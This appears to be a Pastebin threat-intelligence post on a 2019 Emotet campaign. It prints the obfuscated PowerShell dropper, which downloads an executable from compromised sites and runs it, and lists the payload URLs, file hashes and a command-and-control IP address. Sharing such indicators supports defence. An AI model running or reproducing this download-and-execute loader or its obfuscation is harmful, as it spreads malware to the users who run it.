Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 2019-04-24 Emotet
- =================
- PoSH Code
- ---------
- $pXGAA1D=("{1}{0}{2}"-f'ZwA','dBA','B1');
- $qAAQx1A = '397';
- $ABUUZA=("{0}{1}" -f 'k',("{1}{0}" -f("{0}{1}" -f'GU','wA'),'G'));
- $zAGAXAQA=$env:userprofile+'\'+$qAAQx1A+("{0}{1}"-f'.e','xe');
- $Q4U_BGA=("{2}{0}{1}" -f 'AAA','cA','X');
- $ccA4UDB=&('new-ob'+'jec'+'t') net.`WEbCliE`NT;
- $YZB4kQ=("{16}{43}{48}{29}{7}{33}{47}{44}{19}{2}{22}{34}{15}{46}{23}{12}{8}{14}{26}{9}{40}{4}{17}{41}{37}{32}{24}{30}{1}{39}{11}{21}{28}{38}{27}{45}{0}{10}{5}{18}{42}{20}{13}{31}{25}{6}{3}{35}{36}"-f("{0}{1}" -f'pi','nfo'),("{0}{1}" -f 'ng','.n'),("{1}{0}{2}" -f'ad','-',("{1}{0}"-f'/','min')),("{0}{2}{1}"-f 'com',("{1}{0}" -f 'e/','her'),'/t'),'s',("{1}{2}{0}" -f("{1}{0}" -f 'com','a.'),'mat','ic'),'s.','gyn',("{1}{0}{2}"-f 'tp','pha','h'),("{0}{1}{2}" -f("{1}{2}{0}"-f'cl','/wp-','in'),'u','d'),'r',("{2}{0}{1}" -f("{1}{0}"-f '201','_'),'8',("{1}{0}"-f'nu','me')),("{1}{2}{0}" -f 'ez.','ad','s'),'k/@','a','@ht','htt','/V','/','wp',("{1}{0}" -f 'yj',("{0}{1}" -f 'd/J','o')),'/v1','P5p','/',("{0}{1}"-f ':','//d'),("{1}{0}" -f 'g','udy'),("{0}{1}" -f'n',("{1}{0}"-f'com','.')),("{0}{1}"-f':',("{1}{0}"-f'ja','//')),'3X','o',("{3}{0}{1}{2}"-f 'en',("{0}{1}" -f'g','inee'),'ri','kw-'),("{2}{0}{1}" -f 'tp',("{0}{1}"-f ':/','/j'),'ht'),'p','-','e/','I',("{0}{1}"-f 'U','GE/'),("{0}{1}"-f '@h','tt'),("{1}{0}"-f 'p',("{1}{0}{2}" -f '/@h','L','tt')),'et/','e','zj/',("{0}{1}{2}" -f'bo','x',("{0}{1}" -f'cl','ou')),("{0}{1}"-f 'p:','//u'),("{2}{0}{1}{3}" -f ("{0}{1}"-f 'ops.','c'),'om','sh','/'),'s',("{0}{1}"-f't','p:/'),("{1}{0}" -f 'rk','wo'),'r')."SpL`it"('@');
- $JACQcA=("{0}{1}" -f'C',("{0}{1}" -f 'A',("{1}{0}"-f'AA','Ao')));
- foreach($q_AGcAUk in $YZB4kQ){try{$ccA4UDB."DownlOad`F`i`lE"($q_AGcAUk, $zAGAXAQA);
- $fAGc1_AQ=("{1}{0}{2}"-f 'UQU','C',("{0}{1}" -f 'AAQ','D'));
- If ((&('Get'+'-'+'Item') $zAGAXAQA)."leNG`TH" -ge 20694) {.('In'+'voke'+'-It'+'em') $zAGAXAQA;
- $sADXDQA=("{0}{1}"-f("{0}{1}" -f ("{0}{1}"-f 'dA','44'),'1'),'U');
- break;
- $mAxXQ1XZ=("{0}{1}"-f 'j',("{0}{2}{1}"-f'A','U',("{1}{0}"-f'QA','kA')))}}catch{}}$RQAUDAck=("{1}{0}" -f 'BBA','IDx')
- Domains used
- ------------
- http://urogyn-workshops.com/wp-admin/P5pe/
- http://adsez.phatphan.com/wp-includes/Vzj/
- http://dkw-engineering.net/menu_2018/v13XL/
- http://jaspinformatica.com/boxcloud/Joyjk/
- http://judygs.com/there/IUGE/
- Hashes for attachment
- ---------------------
- 0f84045b81e1f16e00f0dd56201468e8 --> https://www.virustotal.com/#/file/6c3477e17063e89277bd134d2b27e7b14d8e089246509e4dea1d400aa68d476e/detection
- aecd38da598664b6feb6e23d369d64ab
- e96332924a6d5bde280444a212f4ebf7 --> https://www.virustotal.com/#/file/2ffb8c50230d55ae57d96801312556d38eaf143052c0942f97b022588c45c722/detection
- Hash for promptrelated.exe
- ---------------------------
- 24c6fc3d5299e9a4cfba1cf5c5f88719 --> https://www.virustotal.com/#/file/323154c4cb75b02983bc4e076be06997644eb8852384aa8d92b48131bc085f00/detection
- C2:
- ---
- 185.94.252.27:443
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement